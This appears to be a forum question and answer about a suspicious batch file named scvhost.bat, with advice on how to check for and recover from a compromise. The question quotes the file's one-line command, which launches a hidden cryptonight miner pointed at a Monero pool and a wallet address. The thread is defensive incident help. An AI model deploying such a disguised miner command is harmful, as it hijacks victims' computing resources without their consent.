Is this scvhost.bat with cryptonight a virus or miner?

windows malware batch-file cryptomining

I have just found this .bat file that was named scvhost.bat. The file had this content in it :

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Is this a virus (to steal info etc) or a planted miner ? I am worried as I also dabble in crypto currencies and stratum is a currency that is mentioned in above file.


This does seem to be a miner of some sort, especially since the parameter contains the URL to a mining pool. However, you need to be sure what is in the binary. It would make sense to compare checksums of the binary you found of your system with the releases made by the development team of the miner. If they differ; consider you system unsecure.

Another issue is that you found out about this miner (probably because it was using a lot of CPU), but you have no idea what else happened on your system. If an intruder could launch the miner, they could've launched other things as well. It might be a good idea to recover from backup or do a fresh install anyway.

Related

Rotate a MP4 file, while preserving codec and quality attributes
Does Microsoft Office 2010 have version control?
Go to middle of line in vim
How do I install zlib on Debian 6?
How to reduce PNG file size for web?
Map Shift + F3 in .vimrc
Is there a way to disable or hide output thrown by FFmpeg? [duplicate]
ASP.NET security
react native version check package make app crash
Class approximation in C - Is this witchcraft or technically acceptable?
Github Actions Matrix include entries conditionally based on GitHub Events
Why does read() not work with 'w+' or 'r+' mode in open() function python